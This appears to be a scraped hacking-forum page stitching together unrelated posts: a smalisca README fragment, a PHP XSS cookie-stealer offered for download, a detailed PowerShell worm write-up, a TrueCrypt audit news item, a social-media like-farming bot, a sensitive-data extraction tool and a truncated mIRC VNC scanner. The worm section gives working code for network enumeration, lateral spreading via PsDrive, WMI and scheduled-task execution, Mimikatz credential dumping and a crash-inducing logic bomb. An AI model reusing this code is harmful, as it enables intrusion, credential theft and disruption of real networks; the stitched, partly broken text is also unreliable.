| id | class_name | class_type | class_package | depth |
+----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
| 1 | Landroid/support/v4/net/ConnectivityManagerCompat | public | Landroid.support.v4.net | 5 |
| 2 | Landroid/support/v4/view/AccessibilityDelegateCompat$AccessibilityDelegateJellyBeanImpl | | Landroid.support.v4.view | 5 |
| 3 | Landroid/support/v4/view/ViewCompat$ViewCompatImpl | interface abstract | Landroid.support.v4.view | 5 |
| 4 | Landroid/support/v4/app/ActivityCompatHoneycomb | | Landroid.support.v4.app | 5 |
| 5 | Landroid/support/v4/app/NoSaveStateFrameLayout | | Landroid.support.v4.app | 5 |
| 6 | Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2 | | Landroid.support.v4.net | 5 |
| 7 | Lcom/gmail/xpack/BuildConfig | public final | Lcom.gmail.xpack | 4 |
| 8 | Landroid/support/v4/app/BackStackRecord$Op | final | Landroid.support.v4.app | 5 |
| 9 | Landroid/support/v4/app/FragmentManagerImpl | final | Landroid.support.v4.app | 5 |
| 10 | Landroid/support/v4/app/ShareCompat$ShareCompatImpl | interface abstract | Landroid.support.v4.app | 5 |
+----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+
Also refer to the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more available **commands** and options.
Drawing
-------
Please refer to the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for full examples.
License
========
*smalisca* has been released under the **MIT** license. Have a look at the **LICENSE.rst** file.
Credits
=======
This tool is dedicated to **Lic?**. Many thanks also go to:
* `Stephen McAllister <https://de.linkedin.com/pub/stephen-mcallister/13/843/71a>`_
* Many thanks for all those hours full of APK debugging and great ideas
* My gf
* Thank you very much for your patience and understanding!
* `nullsecurity.net <http://nullsecurity.net>`_
* Hack the planet!Download:
smalisca-0.1.tar.gz
Description: Static Code Analysis tool for Smali files.
MD5: 943930dbd144c52635f3d5b874482d3a
Author: Cyneox
-
Cookies Manager
Author: Doddy Hackman
A simple program in PHP to help with XSS vulnerability in this program are the following:
[+] Cookie Stealer with TinyURL Generator
[+] Can you see the cookies that brings back a page
[+] Can create cookies with information they want
[+] Hidden to login to enter Panel use ?poraca to find the login
A video with examples of use:
-
-
update, aprox. 20k
https://www.sendspace.com/file/5v8ix9
pwd:
cnN0Zm9ydW1zLmNvbQ==
Enjoy!
-
TL;DR: Another Powershell Worm here.
Recently, I was approached with a few ideas about worms to test the potential to detect/stop such. This, and reading some interesting posts about PowerShell based worm(s), pushed me to attempt to build a worm with a slightly different take.
One of the requirements of this worm is to propagate without certainty of an external connection or not to the internet. This is important if the worm is to jump across an airgap’d network somehow or if the command and control is severed. Also, attempting to dump creds and setting some sort of persistence would be a plus. Lastly, the whole thing (or as much as possible) should be written in powershell, so the option of base64 encoding it and running it in memory is present.
Target enumeration
This is a pick your own adventure technique. First, the worm will need to identify potential targets to spread to. The worm uses 3 techniques (others may exist) to enumerate targets:
- Dump domain hosts
- grab local class C
- grab IPs from netstat
As annotated in an earlier post, we can cycle domain hosts pretty easily if we are logged into a domain via:
function getDomain {
$final = @()
#get Domain computers
$strCategory = "computer"
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
$objSearcher.Filter = ("(objectCategory=$strCategory)")
$colProplist = "name", "cn"
foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$colResults = $objSearcher.FindAll()
foreach ($objResult in $colResults)
{
$objComputer = $objResult.Properties
$bleh = $objComputer.name
$final += $bleh
}
return $final
}But what if the victim host isn’t a part of a domain? This will fail, so error handling will be useful here (see final version at the top of the page). The next attempt to enumerate hosts is a class c brute force. To set this up, the worm needs to know the current IP address of the machine we are on, a la:
$enum = Get-WMIObject win32_NetworkAdapterConfiguration |
Where-Object { $_.IPEnabled -eq $true } |
Foreach-Object { $_.IPAddress } |
Foreach-Object { [IPAddress]$_ } |
Where-Object { $_.AddressFamily -eq 'Internetwork' } |
Foreach-Object { $_.IPAddressToString }Then, the worm parses the first 3 octets and runs through a for loop (assumes /24 at the moment):
function getClassC{
Param($ip);
$final = @()
$classC = $ip.Split(".")[0]+"."+$ip.Split(".")[1]+"."+$ip.Split(".")[2]
for($i=1; $i -lt 255; $i++)
{
$final += $classC + $i.ToString()
}
return $final
}Lastly, the worm will try a netstat “hail mary”:
#//netstat mode
$n = netstat -ano
foreach ($n2 in $n)
{
$n4= $n2.Split(" ")
foreach ($n3 in $n4)
{
$n5 = $n3.Split(":")[0]
if (($n5.Length -gt 7) -and ($n5.Length -lt 22))
{
if (!( ($n5 -eq "0.0.0.0") -or ($n5 -eq $ip) -or ($n5 -eq "127.0.0.1") ) )
{
if ($n5.Contains("."))
{
Write-Host $n5
$final += $n5
}
}
}
}
}Spreading technique
In the testing environment, we were able to spread using the various techniques, but for simplicity we will discuss PsDrive (additional techniques may be used). The credentials used to run the worm as (or lack thereof) will dictate what is available.
PsDrive can set up a powershell accessible share much like net share, except that this share is only viewable in powershell!
Screenshot of successfully created PS-Drive that does not show up under net use.
Here, the worm sets up the PsDrive to copy files over, moves the files to the destination (via C$ in our example, but others shares may exist):
$prof = "USERPROFILE"
$profile = (get-item env:$prof).Value +"\Downloads"
$pro1 = $profile.SubString(3, $profile.Length-3)
$psdrive = "\\"+$nethost+"\C$\"+ $pro1
New-PsDrive -Name Y -PsProvider filesystem -Root $psdriveNext, the worm (and any additional scripts) are copied over:
Copy-Item $profile\PowerW0rm.ps1 Y:\PowerW0rm.ps1
Copy-Item $profile\PowerW0rm.mof Y:\PowerW0rm.mof
Copy-Item $profile\Invoke-Mimikatz.ps1 Y:\Invoke-Mimikatz.ps1
Copy-Item $profile\bypassuac-x64.exe Y:\bypassuac-x64.exeFinally, since this code is running in a loop, the worm removes the PsDrive:
Remove-PsDrive Y
Code Execution
By default in a Windows 7/Server 2008 R2 environment, Remote Powershell isn’t enabled by default. However, other options do exist depending on access level and GPO settings. The worm uses two methods of code execution: schtasks and Invoke-WMIMethod (others will exist, such as Invoke-Command). Some of the examples can be found below:
$run = "powershell -exec Bypass "+$profile+"\\PowerWorm.ps1"
$task = $profile+"\\bypassuac-x64.exe /C powershell.exe -exec Stop-Process csrss" # BSOD for a logic bomb
#run with dump creds
Invoke-WMIMethod -Class Win32_Process -Name Create -Authentication PacketPrivacy -Computername $nethost -Credential $cred
-Impersonation Impersonate -ArgumentList $run
#run as current user
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList $run
#schtask example
schtasks /CREATE /S $nethost /SC Daily /MO 1 /ST 00:01 /TN "update54" /TR $task /F #scheduled for the 1st of the year @ 00:01 AM
schtasks /RUN /TN "update54" #Runs task immediately (kills worm, but just PoC)
schtasks /DEL /TN "update54" #would never run in this context, but is an exampleCredential Harvesting
The worm uses a call to Invoke-Mimikatz.ps1 from the PowerSploit project to dump and parse creds as it jumps from machine to machine. This is achieved will a slight modification to the very end of Invoke-Mimikatz.ps1:
$creds = Invoke-Mimikatz -dumpcreds
Write-Host $credsThe worm first calls Invoke-Minikatz:
#try to grab creds
$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
$scriptPath = $scriptPath + "\Invoke-Mimikatz.ps1 -dumpcreds"
$creds = "powershell.exe -exec Bypass " + $scriptPath
$creds_str = runCMD $credsFollowed by some nifty regex to extract just username and password from output:
$creds_regex= @"
.*\*\sUsername.*
.*\*\sDomain.*
.*\*\sPassword.*
"@
$creds_str = $creds -replace " ", "`r`n"
$cred_store = @{}
$found = new-object System.Text.RegularExpressions.Regex($creds_regex, [System.Text.RegularExpressions.Regexoptions]::Multiline)
$m=$found.Matches($creds_str)And finally, some last minute parsing which trims the strings to exactly what is needed:
function parsed()
{
Param([string]$str1)
$p1 = $str1 -split '[\r\n]'
$parse=@()
for ($j=0; $j -lt 3; $j++)
{
$num = $j*2
$p2 = $p1[$num].split(":")
#Write-Host $j "," $num "," $p2
$p3 = $p2[1]
$parse+= , $p3
}
return $parse
}Additional thoughts
At the top of the post, as well as here, is a link for the complete PoC PowerWorm.ps1. It works well on Vista/7, but there seem to be a few bugs trying run this against XP/8 (due to an error with Invoke-Mimikatz). I used something very similar after gaining domain admin credentials, then began laterally moving in an environment where psexec/winrm/pass-the-hash tricks did not seem to work. I did have some issues (duh) with this worm hammering the DC because there is no check in place to see if the worm had already ran on a host, and the DC is the first host in the domain hosts array! The fix for this issue is left as an exercise for the reader. Also, this script could be easily modified to roll out other files/scripts/binaries across a domain automatically-which I also did trying to push traffic generation scripts for testing at a later date, but that story is for another post.
Source: https://khr0x40sh.wordpress.com/2014/11/13/powershell-worm/
-
The Security audit of TrueCrypt disk-encryption software has been completed, with no evidence of any critical design vulnerabilities or deliberate backdoors in its code.
TrueCrypt -- one of the world's most-used open source file encryption software used by Millions of privacy and security enthusiasts -- is being audited from past two years by a team of security researchers to assess if it could be easily exploited and cracked. Hopefully, it has cleared the second phase of the audit.
TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OSX and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions including the system partition.
NO NSA BACKDOORS
Security Auditors and Cryptography Experts at NCC took an initiative to perform a public information security audit of TrueCrypt in response to the concerns that National Security Agency (NSA) may have tampered with it, according to a leaked classified document by Edward Snowden.
"TrueCrypt appears to be a relatively well-designed piece of crypto software," cryptographic expert Matthew Green wrote in a blog post on Thursday. "The NCC audit found no evidence of deliberate backdoors, or any severe design flaws that will make the software insecure in most instances."TrueCrypt cleared the first phase of the audit that reviewed the blueprints of the software and given a relatively clean bill of health almost a year ago. At the first phase, auditors discovered 11 issues of medium and low severity in the software.
Now, the auditors from NCC Group’s Cryptography and security audit Services have finalized and published the 21-page Open Cryptographic report related to the second phase of audit that examined TrueCrypt's implementation of random number generators and critical key algorithms, and various encryption cipher suites.
FOUR VULNERABILITIES DISCOVERED
The report uncovered four vulnerabilities in the latest original version of the software, but none of them could lead to a bypass of confidentiality or let hackers use deformed inputs to subvert TrueCrypt. The vulnerabilities are given below:
- Keyfile mixing is not cryptographically sound -- Low severity
- Unauthenticated ciphertext in volume headers -- Undetermined
- CryptAcquireContext may silently fail in unusual scenarios -- High severity
- AES implementation susceptible to cache timing attacks -- High severity
The most critical of the four vulnerabilities involved the use of Windows API to generate random numbers used by master cryptographic key.
A separate vulnerability with undetermined severity checks for the volume header decryption was susceptible to tampering. Also, a low severity flaw for a method used to mix the entropy of keyfiles was not cryptographically sound.
Another high severity flaw identified refers to "several included AES implementations that may be vulnerable to cache-timing attacks."
- Keyfile mixing is not cryptographically sound -- Low severity
-
AddMeFast-Bot
Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service
Update: now working anymore, 01-10-2015
import mechanize
import re
from time import sleep
import threading
#cut something in many parts
def chunkIt(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
#generates a browser
def genbrowser():
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_redirect(True)
br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')]
return br
class AMB(threading.Thread):
# define environment variable
def __init__(self, rangex, user, passw):
self.br1 = genbrowser()
self.alogin(self.br1, user, passw)
self.range = rangex
threading.Thread.__init__(self)
self.timeout_value = 30
# log the user in
def alogin(self, br, user, passw):
br.open('http://addmefast.com', \
'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw))
if 'Welcome' in br.response().read():
print "Login successful on add me fast"
#main function
def run(self):
sleep(1)
for i in self.range:
try:
#goes to a page with many links to like
#self.br1.open(
#act=getLinksList¶ms={"network":"1", "page":"1", "isFBpage":"1"}
self.br1.open(
'http://addmefast.com/includes/ajax.php', 'act=getLinksList¶ms={"network":"1", "page":"%s", "isFBpage":"1"}' % (i),timeout=self.timeout_value)
#gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365
page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', self.br1.response().read())
#confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212");
number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", self.br1.response().read())
i = 0
while i < len(page_and_Lid):
page = page_and_Lid[0]
Lid = page_and_Lid[1]
number = number_and_token[0]
token = number_and_token[1]
#http://addmefast.com/includes/ajax.php, act=checkFollowed¶ms={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"}
self.br1.open('http://addmefast.com/includes/ajax.php','act=checkFollowed¶ms={"id":"%s", "url":"%s", "network":"1"}' % (number, page),timeout=self.timeout_value)
#http://addmefast.com/includes/ajax.php, act=updateAction¶ms={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"}
self.br1.open('http://addmefast.com/includes/ajax.php','act=updateAction¶ms={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token),timeout=self.timeout_value)
print "New shit made"
i+=1
except Exception, e:
print e
if __name__=='__main__':
nbthreads = input('Number of threads: ')
z = chunkIt(range(1,int(open("number.txt").read())+1), nbthreads)
user, passw = open('account.txt').read().split(':', 1)
while 1:
for i in z:
try:
AMB(i, user, passw).start()
except:
pass
while threading.activeCount() > 1:
sleep(1)
-
GrabME
Sensitive information extraction tool.
Report a bug:
https://github.com/GuerrillaWarfare/GrabME/issues
Up-to-date Usage examples:
https://github.com/GuerrillaWarfare/GrabME/wiki/GrabME-Usage-Examples
GrabME - Extract Sensitive information from a file.
Usage: ./grabme.py [FILE]
What can it extract ?:
Links
hash values
email addresses
ipv4, ipv6 addresses
bitcoin wallet addresses
MAC addresses with : or - (deliminators)
USA Based Telephone, Social Security and Major Credit Card numbers.Guerrilla Warfare Free License ("GWFL") v1.0
- You're free to modify this software to YOUR liking or leave it as is.
- This software comes as is, and may or may not receive any additional updates, Contact the developer for more help.
- The initial download and use of this software constitutes that you adhere and comply to the writing of this end user license agreement (EULA).
- The Developer is NOT at ALL under any circumstances responsible for YOUR actions or the actions of any other third part instances that may use this software for any illegal or nefarious activities.
-
;Copy code into your mIRC remote scripts
;Syntax is /rvnc <ip.ip.ip.ip> <port>
;ex: /rvnc 192.168.0.0 5900
;above command will scan from 192.168.0.0 to 192.255.255.255 then halt.
;Illegal if you decide to scan IP addresses not in your network
;Education purposes only. Please keep undetected from antiviruses as this code is CLEAN!!!
on *:sockopen:vncscan*:{
if ($sockerr) { return }
}
on *:sockread:vncscan*:{
:nextread
sockread &vnc
if ($sockbr == 0) return
echo @vnc VNC Scan halted. | .timerRANGE off | halt }
}press Alt + R and paste
source: secret-zone.net
Salut RST
in Bine ai venit
Posted
Bun venit!